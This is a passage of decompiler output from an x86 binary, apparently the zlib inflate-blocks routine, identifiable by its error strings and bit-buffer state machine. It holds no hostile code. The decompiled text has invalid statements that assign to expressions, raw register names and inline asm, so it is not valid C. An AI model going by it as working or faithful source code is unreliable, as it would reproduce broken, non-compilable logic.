										if(_t460 > 3) {
											goto L4;
										} else {
											switch( *((intOrPtr*)(_t460 * 4 +  &M004674E8))) {
												case 0:
													goto L14;
												case 1:
													goto L15;
												case 2:
													goto L17;
												case 3:
													goto L100;
											}
										}
									}
									goto L127;
								}
								_t462 =  *(_t507 + 0x48);
								_t465[8] = _t497;
								_t465[7] = _t501;
								_t506 =  *(8 + _t462) + _t492 -  *_t462;
								__eflags = _t506;
								 *(4 + _t462) = 0;
								 *(8 + _t462) = _t506;
								 *_t462 = _t492;
								_t465[0xd] =  *(_t507 + 0x44);
								return E00467F40(_t465, _t462,  *(_t507 + 0x4c));
							}
							goto L127;
						case 1:
							__esi =  *(__esp + 0x18);
							__edi =  *(__esp + 0x14);
							__eax =  *(__esp + 0x10);
							__eflags = __ebp - 0x20;
							if(__ebp >= 0x20) {
								L21:
								__edx = __esi;
								__ecx = __esi;
								__edx =  !__esi;
								__ecx = __esi & 0x0000ffff;
								 !__esi >> 0x10 =  !__esi >> 0x00000010 ^ __ecx;
								__eflags =  !__esi >> 0x00000010 ^ __ecx;
								if(( !__esi >> 0x00000010 ^ __ecx) != 0) {
									__ecx =  *(__esp + 0x48);
									 *__ebx = 9;
									__edx = __eax;
									 *(__ecx + 0x18) = "invalid stored block lengths";
									__ebx[8] = __esi;
									__ebx[7] = __ebp;
									__esi =  *__ecx;
									__ebp =  *(8 + __ecx);
									__edx = __eax -  *__ecx;
									__ebp = __eax -  *__ecx +  *(8 + __ecx);
									__eflags = __ebp;
									 *__ecx = __eax;
									__eax =  *(__esp + 0x48);
									 *(4 + __ecx) = __edi;
									 *(8 + __ecx) = __ebp;
									__ebx[0xd] =  *(__esp + 0x48);
									__eax = E00467F40(__ebx, __ecx, 0xfffffffd);
									_pop(__edi);
									_pop(__esi);
									return __eax;
								} else {
									__ebp = 0;
									__eax = __ecx;
									__eflags = __ecx;
									__ebx[1] = __ecx;
									 *(__esp + 0x18) = 0;
									if(__ecx == 0) {
										goto L48;
									} else {
										__eax = 2;
										 *__ebx = 2;
									}
									goto L4;
								}
							} else {
								while(1) {
									__edx = 0;
									__eflags = __edi;
									if(__edi == 0) {
										break;
									}
									__ecx = 0;
									 *(__esp + 0x4c) = 0;
									__cl =  *__eax;
									__edi = __edi - 1;
									__edx = 0;
									__ecx = __ebp;
									__edx = 0 << __cl;
									__ebp = 8 + __ebp;
									 *(__esp + 0x14) = __edi;
									__esi = __esi | 0 << __cl;
									__eax = __eax + 1;
									__eflags = __ebp - 0x20;
									 *(__esp + 0x10) = __eax;
									if(__ebp < 0x20) {
										continue;
									} else {
										goto L21;
									}
									goto L127;
								}
								__ecx =  *(__esp + 0x48);
								__ebx[8] = __esi;
								__ebx[7] = __ebp;
								__esi =  *__ecx;
								__ebp =  *(8 + __ecx);
								 *(4 + __ecx) = 0;
								__edx = __eax;
								__edx = __eax -  *__ecx;
								 *__ecx = __eax;
								__eax =  *(__esp + 0x44);
								__ebp = __edx +  *(8 + __ecx);
								__eflags = __ebp;
								__edx =  *(__esp + 0x4c);
								 *(8 + __ecx) = __ebp;
								__ebx[0xd] =  *(__esp + 0x44);
								__eax = E00467F40(__ebx, __ecx,  *(__esp + 0x4c));
								_pop(__edi);
								_pop(__esi);
								return __eax;
							}
							goto L127;
						case 2:
							__edi =  *(__esp + 0x14);
							__eflags = __edi;
							if(__edi == 0) {
								__ecx =  *(__esp + 0x18);
								__eax =  *(__esp + 0x48);
								__ebx[8] =  *(__esp + 0x18);
								__ecx =  *(__esp + 0x10);
								__ebx[7] = __ebp;
								__esi =  *__eax;
								__ebp =  *(__eax + 8);
								__edx = __ecx;
								__edx = __ecx -  *__eax;
								 *__eax = __ecx;
								__ecx =  *(__esp + 0x44);
								__ebp = __edx +  *(__eax + 8);
								__eflags = __ebp;
								__edx =  *(__esp + 0x4c);
								 *(__eax + 4) = 0;
								 *(__eax + 8) = __ebp;
								__ebx[0xd] =  *(__esp + 0x44);
								__eax = E00467F40(__ebx, __eax,  *(__esp + 0x4c));
								_pop(__edi);
								_pop(__esi);
								return __eax;
							} else {
								__ecx =  *(__esp + 0x1c);
								__eflags = __ecx;
								if(__ecx != 0) {
									L43:
									__eax = __ebx[1];
									 *(__esp + 0x4c) = 0;
									__eflags = __eax - __edi;
									if(__eax > __edi) {
										__eax = __edi;
									}
									__eflags = __eax - __ecx;
									if(__eax > __ecx) {
										__eax = __ecx;
									}
									__esi =  *(__esp + 0x10);
									__edi =  *(__esp + 0x44);
									__ecx = __eax;
									__edx = __ecx;
									__ecx = __ecx >> 2;
									__eax = memcpy( *(__esp + 0x44), __esi, __ecx << 2);
									__edi = __esi + __ecx;
									__edi = __esi + __ecx + __ecx;
									__ecx = 0;
									__ecx = __edx;
									__edx =  *(__esp + 0x1c);
									__ecx = __ecx & 0x00000003;
									__edx =  *(__esp + 0x1c) - __eax;
									__eax = memcpy(__edi, __esi, __ecx);
									__esi + __ecx = __esi + __ecx + __ecx;
									0 =  *(__esp + 0x10);
									__edi =  *(__esp + 0x14);
									__esi =  *(__esp + 0x44);
									__ecx = __eax +  *(__esp + 0x10);
									 *(__esp + 0x10) = __eax +  *(__esp + 0x10);
									__ecx = __ebx[1];
									__edi =  *(__esp + 0x14) - __eax;
									__esi =  *(__esp + 0x44) + __eax;
									__ecx = __ebx[1] - __eax;
									__eflags = __ecx;
									 *(__esp + 0x14) = __edi;
									 *(__esp + 0x44) = __esi;
									 *(__esp + 0x1c) = __edx;
									__ebx[1] = __ecx;
									if(__ecx == 0) {
										L48:
										__ebx[6] =  ~(__ebx[6]);
										asm("sbb eax, eax");
										__eax =  ~(__ebx[6]) & 0x00000007;
										 *__ebx =  ~(__ebx[6]) & 0x00000007;
									}
									goto L4;
								} else {
									__ecx = __ebx[0xb];
									__edx =  *(__esp + 0x44);
									__eflags = __edx - __ecx;
									if(__edx != __ecx) {
										L32:
										__eax =  *(__esp + 0x4c);
										__edi =  *(__esp + 0x48);
										__ebx[0xd] = __edx;
										__eax = E00467F40(__ebx, __edi,  *(__esp + 0x4c));
										__edx = __ebx[0xd];
										__esi = __ebx[0xc];
										__eflags = __edx - __esi;
										 *(__esp + 0x4c) = __eax;
										 *(__esp + 0x44) = __edx;
										if(__edx >= __esi) {
											__ecx = __ebx[0xb];
											__ecx = __ebx[0xb] - __edx;
											__eflags = __ecx;
										} else {
											__esi = __esi - __edx;
											__ecx = __esi - __edx - 1;
										}
										__eax = __ebx[0xb];
										 *(__esp + 0x1c) = __ecx;
										__eflags = __edx - __eax;
										 *(__esp + 0x20) = __eax;
										if(__edx == __eax) {
											__eax = __ebx[0xa];
											__eflags = __esi - __eax;
											if(__esi != __eax) {
												__edx = __eax;
												__eflags = __edx - __esi;
												 *(__esp + 0x44) = __edx;
												if(__edx >= __esi) {
													__ecx =  *(__esp + 0x20);
													__ecx =  *(__esp + 0x20) - __edx;
													__eflags = __ecx;
												} else {
													__esi = __esi - __edx;
													__ecx = __esi;
												}
												 *(__esp + 0x1c) = __ecx;
											}
										}
										__eflags = __ecx;
										if(__ecx == 0) {
											__eax =  *(__esp + 0x18);
											__ecx =  *(__esp + 0x14);
											__ebx[8] =  *(__esp + 0x18);
											__eax =  *(__esp + 0x10);
											__ebx[7] = __ebp;
											__ebp =  *__edi;
											__esi =  *(__edi + 8);
											 *(__edi + 4) =  *(__esp + 0x14);
											__ecx = __eax;
											 *__edi = __eax;
											__ecx = __eax -  *__edi;
											__esi =  *(__edi + 8) + __eax -  *__edi;
											__eflags = __esi;
											 *(__edi + 8) = __esi;
											__ebx[0xd] = __edx;
											__edx =  *(__esp + 0x4c);
											__eax = E00467F40(__ebx, __edi,  *(__esp + 0x4c));
											_pop(__edi);
											_pop(__esi);
											return __eax;
										} else {
											__edi =  *(__esp + 0x14);
											goto L43;
										}
									} else {
										__eax = __ebx[0xc];
										__esi = __ebx[0xa];
										__eflags = __eax - __esi;
										if(__eax == __esi) {
											goto L32;
										} else {
											__edx = __esi;
											__eflags = __edx - __eax;
											 *(__esp + 0x44) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
											} else {
												__eax = __eax - __edx;
												__ecx = __eax;
											}
											__eflags = __ecx;
											 *(__esp + 0x1c) = __ecx;
											if(__ecx != 0) {
												goto L43;
											} else {
												goto L32;
											}
										}
									}
								}
							}
							goto L127;
						case 3:
							__edi =  *(__esp + 0x18);
							__eflags = __ebp - 0xe;
							if(__ebp >= 0xe) {
								L53:
								__eax = __edi;
								__eax = __edi & 0x00003fff;
								__ecx = __eax;
								__ebx[1] = __eax;
								__ecx = __eax & 0x0000001f;
								__eflags = __ecx - 0x1d;
								if(__ecx > 0x1d) {
									L107:
									__eax =  *(__esp + 0x48);
									__ecx =  *(__esp + 0x14);
									 *__ebx = 9;
									 *(__eax + 0x18) = "too many length or distance symbols";
									__ebx[8] = __edi;
									__ebx[7] = __ebp;
									__esi =  *__eax;
									__ebp =  *(__eax + 8);
									 *(__eax + 4) =  *(__esp + 0x14);
									__ecx =  *(__esp + 0x14);
									__edx = __ecx;
									 *__eax = __ecx;
									__ecx =  *(__esp + 0x4c);
									__ebp = __edx +  *(__eax + 8);
									__eflags = __ebp;
									 *(__eax + 8) = __ebp;
									__ebx[0xd] =  *(__esp + 0x4c);
									__eax = E00467F40(__ebx, __eax, 0xfffffffd);
									_pop(__edi);
									_pop(__esi);
									return __eax;
								} else {
									__eax = __eax & 0x000003e0;
									__eflags = (__eax & 0x000003e0) - 0x3a0;
									if((__eax & 0x000003e0) > 0x3a0) {
										goto L107;
									} else {
										__esi =  *(__esp + 0x48);
										_push(4);
										__eax = __eax >> 5;
										__eax = __eax & 0x0000001f;
										__eax = __eax + __ecx + 0x102;
										__ecx =  *(__esi + 0x28);
										_push(__eax);
										_push( *(__esi + 0x28));
										__eax =  *((intOrPtr*)(__esi + 0x20))();
										__esp = __esp + 0xc;
										__ebx[3] = __eax;
										__eflags = __eax;
										if(__eax == 0) {
											__eax =  *(__esp + 0x14);
											__ebx[8] = __edi;
											__ebx[7] = __ebp;
											__edi =  *__esi;
											__edx =  *(__esi + 8);
											 *(__esi + 4) =  *(__esp + 0x14);
											__eax =  *(__esp + 0x10);
											__eax = __eax -  *__esi;
											 *__esi = __eax;
											__edx =  *(__esi + 8) + __eax -  *__esi;
											__eflags = __edx;
											 *(__esi + 8) = __edx;
											__edx =  *(__esp + 0x50);
											__ebx[0xd] =  *(__esp + 0x50);
											__eax = E00467F40(__ebx, __esi, 0xfffffffc);
											_pop(__edi);
											_pop(__esi);
											return __eax;
										} else {
											__edi = __edi >> 0xe;
											__ebp = __ebp - 0xe;
											__ebx[2] = 0;
											 *__ebx = 4;
											goto L58;
										}
									}
								}
							} else {
								__esi =  *(__esp + 0x14);
								__eax =  *(__esp + 0x10);
								while(1) {
									__eflags = __esi;
									if(__esi == 0) {
										break;
									}
									__ecx = 0;
									__esi = __esi - 1;
									__cl =  *__eax;
									 *(__esp + 0x4c) = 0;
									__edx = 0;
									__ecx = __ebp;
									__edx = 0 << __cl;
									__ebp = 8 + __ebp;
									 *(__esp + 0x14) = __esi;
									__edi = __edi | 0 << __cl;
									__eax = __eax + 1;
									__eflags = __ebp - 0xe;
									 *(__esp + 0x10) = __eax;
									if(__ebp < 0xe) {
										continue;
									} else {
										goto L53;
									}
									goto L127;
								}
								__eax =  *(__esp + 0x48);
								__ecx =  *(__esp + 0x10);
								__ebx[8] = __edi;
								__ebx[7] = __ebp;
								__esi =  *__eax;
								__ebp =  *(__eax + 8);
								__edx = __ecx;
								 *__eax = __ecx;
								__ecx =  *(__esp + 0x44);
								__ebp = __edx +  *(__eax + 8);
								__eflags = __ebp;
								__edx =  *(__esp + 0x4c);
								 *(__eax + 4) = 0;
								 *(__eax + 8) = __ebp;
								__ebx[0xd] =  *(__esp + 0x44);
								__eax = E00467F40(__ebx, __eax,  *(__esp + 0x4c));
								_pop(__edi);
								_pop(__esi);
								return __eax;
							}
							goto L127;
						case 4:
							__edi =  *(__esp + 0x18);
							__esi =  *(__esp + 0x48);
							L58:
							__edx = __ebx[1];
							__eax = __ebx[2];
							__ebx[1] >> 0xa = 4 + (__ebx[1] >> 0xa);
							__eflags = __ebx[2] - 4 + (__ebx[1] >> 0xa);
							if(__ebx[2] >= 4 + (__ebx[1] >> 0xa)) {
								L64:
								__ecx = __ebx[2];
								__eax = 0x13;
								__eflags = __ebx[2] - 0x13;
								if(__ebx[2] < 0x13) {
									do {
										__ecx = __ebx[2];
										__edx =  *(0x49b274 + __ebx[2] * 4);
										__ecx = __ebx[3];
										 *(__ebx[3] +  *(0x49b274 + __ebx[2] * 4) * 4) = 0;
										__edx = __ebx[2];
										__edx = __ebx[2] + 1;
										__ecx = __edx;
										__ebx[2] = __edx;
										__eflags = __edx - 0x13;
									} while (__edx < 0x13);
								}
								__edx = __ebx[9];
								__ecx =  &(__ebx[5]);
								__eax =  &(__ebx[4]);
								__edx = __ebx[3];
								__ebx[4] = 7;
								__eax = E00467CD0(__ebx[3], __eax,  &(__ebx[5]), __ebx[9], __esi);
								 *(__esp + 0x18) = __eax;
								__eflags = __eax;
								if(__eax != 0) {
									__edx = __ebx[3];
									__eax =  *(__esi + 0x28);
									_push(__ebx[3]);
									_push( *(__esi + 0x28));
									__eax =  *((intOrPtr*)(__esi + 0x24))();
									__eax =  *(__esp + 0x20);
									__esp = __esp + 8;
									__eflags = __eax - 0xfffffffd;
									goto L113;
								} else {
									__ebx[2] = __eax;
									 *__ebx = 5;
									goto L69;
								}
							} else {
								do {
									__eflags = __ebp - 3;
									if(__ebp >= 3) {
										goto L63;
									} else {
										__eax =  *(__esp + 0x10);
										while(1) {
											__ecx =  *(__esp + 0x14);
											__eflags = __ecx;
											if(__ecx == 0) {
												break;
											}
											__edx = __ecx;
											__ecx = 0;
											__cl =  *__eax;
											 *(__esp + 0x14) = __edx;
											__edx = 0;
											__ecx = __ebp;
											__ebp = 8 + __ebp;
											__edx = 0 << __cl;
											 *(__esp + 0x4c) = 0;
											__edi = __edi | 0 << __cl;
											__eax = __eax + 1;
											__eflags = __ebp - 3;
											 *(__esp + 0x10) = __eax;
											if(__ebp < 3) {
												continue;
											} else {
												goto L63;
											}
											goto L127;
										}
										__eax =  *(__esp + 0x10);
										__ebx[8] = __edi;
										__ebx[7] = __ebp;
										__edi =  *__esi;
										__ecx =  *(__esi + 8);
										__edx = __eax;
										__edx = __eax -  *__esi;
										 *__esi = __eax;
										__eax =  *(__esp + 0x44);
										__ecx =  *(__esi + 8) + __edx;
										__eflags = __ecx;
										 *(__esi + 8) = __ecx;
										__ecx =  *(__esp + 0x4c);
										 *(__esi + 4) = 0;
										__ebx[0xd] =  *(__esp + 0x44);
										__eax = E00467F40(__ebx, __esi,  *(__esp + 0x4c));
										_pop(__edi);
										_pop(__esi);
										return __eax;
									}
									goto L127;
									L63:
									__ecx = __ebx[2];
									__eax = __edi;
									__eax = __edi & 0x00000007;
									__ebp = __ebp - 3;
									__edx =  *(0x49b274 + __ebx[2] * 4);
									__ecx = __ebx[3];
									__edi = __edi >> 3;
									 *(__ebx[3] +  *(0x49b274 + __ebx[2] * 4) * 4) = __eax;
									__edx = __ebx[2];
									__edx = __ebx[2] + 1;
									__ebx[2] = __edx;
									__eax = __edx;
									__ebx[1] = __ebx[1] >> 0xa;
									__edx = 4 + (__ebx[1] >> 0xa);
									__eflags = __eax - 4 + (__ebx[1] >> 0xa);
								} while (__eax < 4 + (__ebx[1] >> 0xa));
								goto L64;
							}
							goto L127;
						case 5:
							__edi =  *(__esp + 0x18);
							__esi =  *(__esp + 0x48);
							L69:
							__eax = __ebx[1];
							__ecx = __ebx[2];
							__edx = __eax;
							__eax = __eax & 0x0000001f;
							__edx = __edx >> 5;
							__edx = __edx & 0x0000001f;
							_t141 = __eax + 0x102; // 0x102
							__eax = __edx + _t141;
							__eflags = __ebx[2] - __edx + _t141;
							if(__ebx[2] >= __edx + _t141) {
								L88:
								__ecx = __ebx[9];
								__eax = __ebx[1];
								__edx = __esp + 0x40;
								__ecx = __esp + 0x44;
								__edx = __esp + 0x2c;
								__ecx = __esp + 0x30;
								__edx = __ebx[3];
								__eax = __eax >> 5;
								__ecx = __eax >> 0x00000005 & 0x0000001f;
								__eax = __eax & 0x0000001f;
								__ecx = __ecx + 1;
								__eax = __eax + 0x101;
								__ebx[5] = 0;
								 *(__esp + 0x44) = 9;
								 *(__esp + 0x40) = 6;
								__eax = E00467D80(__eax, __ecx, __ebx[3], __ecx, __esp + 0x2c, __ecx, __esp + 0x40, __ebx[9], __esi);
								__edx = __ebx[3];
								 *(__esp + 0x3c) = __eax;
								__eax =  *(__esi + 0x28);
								_push(__ebx[3]);
								_push( *(__esi + 0x28));
								__eax =  *((intOrPtr*)(__esi + 0x24))();
								__eax =  *(__esp + 0x44);
								__esp = __esp + 0x2c;
								__eflags = __eax;
								if(__eax != 0) {
									__eflags =  *(__esp + 0x18) - 0xfffffffd;
									L113:
									if(__eflags == 0) {
										 *__ebx = 9;
									}
									__eax =  *(__esp + 0x10);
									__ecx =  *(__esp + 0x14);
									__ebx[8] = __edi;
									__ebx[7] = __ebp;
									__edi =  *__esi;
									__edx = __eax;
									 *(__esi + 4) =  *(__esp + 0x14);
									__ecx =  *(__esi + 8);
									__edx = __eax -  *__esi;
									 *__esi = __eax;
									__eax =  *(__esp + 0x44);
									__ecx =  *(__esi + 8) + __edx;
									__eflags = __ecx;
									 *(__esi + 8) = __ecx;
									__ecx =  *(__esp + 0x18);
									__ebx[0xd] =  *(__esp + 0x44);
									__eax = E00467F40(__ebx, __esi,  *(__esp + 0x18));
									_pop(__edi);
									_pop(__esi);
									return __eax;
								} else {
									__ecx =  *(__esp + 0x38);
									__edx =  *(__esp + 0x3c);
									__eax =  *(__esp + 0x1c);
									__eax = E0045F990( *((intOrPtr*)(__esp + 0x28)),  *(__esp + 0x1c),  *(__esp + 0x3c),  *((intOrPtr*)(__esp + 0x28)), __esi);
									__eflags = __eax;
									if(__eax == 0) {
										__eax =  *(__esp + 0x10);
										__edx =  *(__esp + 0x14);
										__ebx[8] = __edi;
										__ebx[7] = __ebp;
										__edi =  *__esi;
										__ecx = __eax;
										 *(__esi + 4) =  *(__esp + 0x14);
										__edx =  *(__esi + 8);
										__ecx = __eax -  *__esi;
										__edx =  *(__esi + 8) + __eax -  *__esi;
										__eflags = __edx;
										 *(__esi + 8) = __edx;
										__edx =  *(__esp + 0x4c);
										 *__esi = __eax;
										__ebx[0xd] =  *(__esp + 0x4c);
										__eax = E00467F40(__ebx, __esi, 0xfffffffc);
										_pop(__edi);
										_pop(__esi);
										return __eax;
									} else {
										__ebx[1] = __eax;
										 *__ebx = 6;
										goto L92;
									}
								}
							} else {
								do {
									__eax = __ebx[4];
									__eflags = __ebp - __eax;
									if(__ebp >= __eax) {
										L73:
										__eax =  *(0x4b83a0 + __eax * 4);
										__ecx = __ebx[5];
										__eax = __eax & __edi;
										__edx = 0;
										__eax = __ebx[5] + __eax * 8;
										 *(__esp + 0x18) = 0;
										__eax =  *(__eax + 4);
										__eflags = __eax - 0x10;
										 *(__esp + 0x34) = __eax;
										if(__eax >= 0x10) {
											__eflags = __eax - 0x12;
											__ecx = 7;
											if(__eax != 0x12) {
												_t165 = __eax - 0xe; // -14
												__ecx = _t165;
											}
											__eax = __eax - 0x12;
											 *(__esp + 0x1c) = __ecx;
											__eax =  ~__eax;
											asm("sbb eax, eax");
											__ecx = __edx + __ecx;
											__al = __al & 0x000000f8;
											 *(__esp + 0x20) = __ecx;
											__eax = __eax + 0xb;
											__eflags = __ebp - __ecx;
											if(__ebp >= __ecx) {
												L81:
												__ecx = __edx;
												__edi = __edi >> __cl;
												__ecx =  *(__esp + 0x1c);
												__ecx =  *(0x4b83a0 +  *(__esp + 0x1c) * 4);
												__ecx =  *(0x4b83a0 +  *(__esp + 0x1c) * 4) & __edi;
												__eax = __eax + ( *(0x4b83a0 +  *(__esp + 0x1c) * 4) & __edi);
												__ecx =  *(__esp + 0x1c);
												__edi = __edi >> __cl;
												__ecx =  *(__esp + 0x1c) + __edx;
												 *(__esp + 0x18) = __eax;
												__ebp = __ebp -  *(__esp + 0x1c) + __edx;
												__ecx = __ebx[2];
												 *(__esp + 0x1c) = __ebx[2];
												__ecx = __ebx[1];
												__edx = __ecx;
												__ecx = __ecx & 0x0000001f;
												__edx = __edx >> 5;
												__edx = __edx & 0x0000001f;
												_t185 = __ecx + 0x102; // 0x102
												__ecx = __edx + _t185;
												__edx =  *(__esp + 0x1c);
												__eax = __eax + __edx;
												__eflags = __eax - __ecx;
												if(__eax > __ecx) {
													L111:
													__edx = __ebx[3];
													__eax =  *(__esi + 0x28);
													_push(__ebx[3]);
													_push( *(__esi + 0x28));
													__eax =  *((intOrPtr*)(__esi + 0x24))();
													__eax =  *(__esp + 0x18);
													__ecx =  *(__esp + 0x1c);
													 *__ebx = 9;
													 *(__esi + 0x18) = "invalid bit length repeat";
													__ebx[8] = __edi;
													__ebx[7] = __ebp;
													__edi =  *__esi;
													__edx = __eax;
													 *(__esi + 4) =  *(__esp + 0x1c);
													__ecx =  *(__esi + 8);
													__edx = __eax -  *__esi;
													 *__esi = __eax;
													__eax =  *(__esp + 0x4c);
													__ecx =  *(__esi + 8) + __edx;
													__eflags = __ecx;
													 *(__esi + 8) = __ecx;
													__ebx[0xd] =  *(__esp + 0x4c);
													__eax = E00467F40(__ebx, __esi, 0xfffffffd);
													_pop(__edi);
													_pop(__esi);
													return __eax;
												} else {
													__eflags =  *(__esp + 0x34) - 0x10;
													if( *(__esp + 0x34) != 0x10) {
														__eax =  *(__esp + 0x1c);
														__ecx = 0;
														__eflags = 0;
														goto L86;
													} else {
														__eax = __edx;
														__eflags = __eax - 1;
														if(__eax < 1) {
															goto L111;
														} else {
															__ecx = __ebx[3];
															__ecx =  *(__ebx[3] + __eax * 4 - 4);
															do {
																L86:
																__edx = __ebx[3];
																__eax = __eax + 1;
																 *(__ebx[3] + __eax * 4 - 4) = __ecx;
																__edx =  *(__esp + 0x18);
																__edx =  *(__esp + 0x18) - 1;
																__eflags = __edx;
																 *(__esp + 0x18) = __edx;
															} while (__edx != 0);
															goto L87;
														}
													}
												}
											} else {
												while(1) {
													__ecx =  *(__esp + 0x14);
													__eflags = __ecx;
													if(__ecx == 0) {
														goto L110;
													}
													__edx = __ecx;
													__ecx = 0;
													__edx = __edx - 1;
													 *(__esp + 0x4c) = 0;
													 *(__esp + 0x14) = __edx;
													__edx =  *(__esp + 0x10);
													__cl =  *( *(__esp + 0x10));
													__edx = 0;
													__ecx = __ebp;
													__edx = 0 << __cl;
													__ecx =  *(__esp + 0x10);
													__ebp = 8 + __ebp;
													__edi = __edi | 0 << __cl;
													__ecx =  *(__esp + 0x10) + 1;
													 *(__esp + 0x10) =  *(__esp + 0x10) + 1;
													__ecx =  *(__esp + 0x20);
													__eflags = __ebp -  *(__esp + 0x20);
													if(__ebp <  *(__esp + 0x20)) {
														continue;
													} else {
														__edx =  *(__esp + 0x18);
														goto L81;
													}
													goto L127;
												}
												goto L110;
											}
										} else {
											__ecx = 0;
											__ebp = __ebp;
											__edx = __ebx[3];
											__edi = __edi >> __cl;
											__ecx = __ebx[2];
											 *(__ebx[3] + __ebx[2] * 4) = __eax;
											__eax = __ebx[2];
											__eax = __ebx[2] + 1;
											goto L87;
										}
									} else {
										while(1) {
											__ecx =  *(__esp + 0x14);
											__eflags = __ecx;
											if(__ecx == 0) {
												break;
											}
											__edx = __ecx;
											__ecx = 0;
											__edx = __edx - 1;
											 *(__esp + 0x4c) = 0;
											 *(__esp + 0x14) = __edx;
											__edx =  *(__esp + 0x10);
											__cl =  *( *(__esp + 0x10));
											__edx = 0;
											__ecx = __ebp;
											__edx = 0 << __cl;
											__ecx =  *(__esp + 0x10);
											__ebp = 8 + __ebp;
											__edi = __edi | 0 << __cl;
											__ecx =  *(__esp + 0x10) + 1;
											__eflags = __ebp - __eax;
											 *(__esp + 0x10) =  *(__esp + 0x10) + 1;
											if(__ebp < __eax) {
												continue;
											} else {
												goto L73;
											}
											goto L127;
										}
										L110:
										__eax =  *(__esp + 0x10);
										__ebx[8] = __edi;
										__ebx[7] = __ebp;
										__edi =  *__esi;
										__ecx =  *(__esi + 8);
										__edx = __eax;
										__edx = __eax -  *__esi;
										 *__esi = __eax;
										__eax =  *(__esp + 0x44);
										__ecx =  *(__esi + 8) + __edx;
										__eflags = __ecx;
										 *(__esi + 8) = __ecx;
										__ecx =  *(__esp + 0x4c);
										 *(__esi + 4) = 0;
										__ebx[0xd] =  *(__esp + 0x44);
										__eax = E00467F40(__ebx, __esi,  *(__esp + 0x4c));
										_pop(__edi);
										_pop(__esi);
										return __eax;
									}
									goto L127;
									L87:
									__ebx[2] = __eax;
									__eax = __ebx[1];
									__ecx = __ebx[2];
									__eax = __eax >> 5;
									__edx = __eax >> 0x00000005 & 0x0000001f;
									_t203 = __eax + 0x102; // 0x102
									__eax = __edx + _t203;
									__eflags = __ebx[2] - __edx + _t203;
								} while (__ebx[2] < __edx + _t203);
								goto L88;
							}
							goto L127;
						case 6:
							__edi =  *(__esp + 0x18);
							__esi =  *(__esp + 0x48);
							L92:
							__eax =  *(__esp + 0x10);
							__edx =  *(__esp + 0x14);
							__ebx[8] = __edi;
							__ebx[7] = __ebp;
							__edi =  *__esi;
							__ecx = __eax;
							 *(__esi + 4) =  *(__esp + 0x14);
							__edx =  *(__esi + 8);
							__ecx = __eax -  *__esi;
							 *__esi = __eax;
							__eax =  *(__esp + 0x4c);
							__edx =  *(__esi + 8) + __ecx;
							 *(__esi + 8) =  *(__esi + 8) + __ecx;
							__edx =  *(__esp + 0x44);
							_push( *(__esp + 0x4c));
							_push(__esi);
							_push(__ebx);
							__ebx[0xd] = __edx;
							__eax = E00467500();
							__esp = __esp + 0xc;
							__eflags = __eax - 1;
							if(__eax != 1) {
								goto L121;
							} else {
								__ecx = __ebx[1];
								 *(__esp + 0x54) = 0;
								E00467CB0(__ebx[1], __esi) = __ebx[8];
								__ecx = __ebx[0xd];
								__edi =  *__esi;
								__edx =  *(__esi + 4);
								__ebp = __ebx[7];
								 *(__esp + 0x20) = __ebx[8];
								__eax = __ebx[0xc];
								__eflags = __ecx - __eax;
								 *(__esp + 0x10) = __edi;
								 *(__esp + 0x14) =  *(__esi + 4);
								 *(__esp + 0x44) = __ecx;
								if(__ecx >= __eax) {
									__eax = __ebx[0xb];
									__eax = __ebx[0xb] - __ecx;
									__eflags = __eax;
								} else {
									__eax = __eax - __ecx;
									__eax = __eax - 1;
								}
								 *(__esp + 0x1c) = __eax;
								__eax = __ebx[6];
								__eflags = __ebx[6];
								if(__ebx[6] != 0) {
									 *__ebx = 7;
									goto L119;
								} else {
									 *__ebx = 0;
									goto L4;
								}
							}
							goto L127;
						case 7:
							__ecx =  *(__esp + 0x44);
							__edi =  *(__esp + 0x10);
							__esi =  *(__esp + 0x48);
							L119:
							__eax =  *(__esp + 0x4c);
							__ebx[0xd] = __ecx;
							__eax = E00467F40(__ebx, __esi,  *(__esp + 0x4c));
							__ecx = __ebx[0xd];
							__edx = __ebx[0xc];
							__eflags = __ebx[0xc] - __ecx;
							if(__ebx[0xc] == __ecx) {
								 *__ebx = 8;
								goto L124;
							} else {
								__edx =  *(__esp + 0x18);
								__ebx[7] = __ebp;
								__ebx[8] =  *(__esp + 0x18);
								__edx =  *(__esp + 0x14);
								__ebp =  *__esi;
								 *(__esi + 4) =  *(__esp + 0x14);
								__edx = __edi;
								 *__esi = __edi;
								__edx = __edi -  *__esi;
								__ebp =  *(__esi + 8);
								__ebp =  *(__esi + 8) + __edi -  *__esi;
								__eflags = __ebp;
								 *(__esi + 8) = __ebp;
								__ebx[0xd] = __ecx;
								L121:
								__eax = E00467F40(__ebx, __esi, __eax);
								_pop(__edi);
								_pop(__esi);
								return __eax;
							}
							goto L127;
						case 8:
							__ecx =  *(__esp + 0x44);
							__edi =  *(__esp + 0x10);
							__esi =  *(__esp + 0x48);
							L124:
							__eax =  *(__esp + 0x18);
							__edx =  *(__esp + 0x14);
							__ebx[8] =  *(__esp + 0x18);
							__ebx[7] = __ebp;
							__ebp =  *__esi;
							__eax = __edi;
							 *(__esi + 4) =  *(__esp + 0x14);
							__edx =  *(__esi + 8);
							__eax = __edi -  *__esi;
							__edx =  *(__esi + 8) + __edi -  *__esi;
							__eflags = __edx;
							 *(__esi + 8) = __edx;
							 *__esi = __edi;
							__ebx[0xd] = __ecx;
							__eax = E00467F40(__ebx, __esi, 1);
							_pop(__edi);
							_pop(__esi);
							return __eax;
							goto L127;
						case 9:
							__ecx =  *(__esp + 0x18);
							__eax =  *(__esp + 0x48);
							__edx =  *(__esp + 0x14);
							__ebx[8] =  *(__esp + 0x18);
							__ecx =  *(__esp + 0x10);
							__ebx[7] = __ebp;
							__esi =  *__eax;
							__ebp =  *(__eax + 8);
							 *(__eax + 4) =  *(__esp + 0x14);
							__edx = __ecx;
							__edx = __ecx -  *__eax;
							 *__eax = __ecx;
							__ecx =  *(__esp + 0x44);
							__ebp = __edx +  *(__eax + 8);
							__eflags = __ebp;
							 *(__eax + 8) = __ebp;
							__ebx[0xd] =  *(__esp + 0x44);
							__eax = E00467F40(__ebx, __eax, 0xfffffffd);
							_pop(__edi);
							_pop(__esi);
							return __eax;
							goto L127;
						case 0xa:
							L14:
							_t504 = _t501 - 3;
							 *_t465 = 1;
							_t480 = _t504 & 0x00000007;
							_t501 = _t504 - _t480;
							 *(_t507 + 0x18) = _t497 >> 3 >> _t480;
							goto L4;
						case 0xb:
							L15:
							__edx =  *(__esp + 0x48);
							__eax = __esp + 0x24;
							_push( *(__esp + 0x48));
							__ecx = __esp + 0x2c;
							__edx = __esp + 0x34;
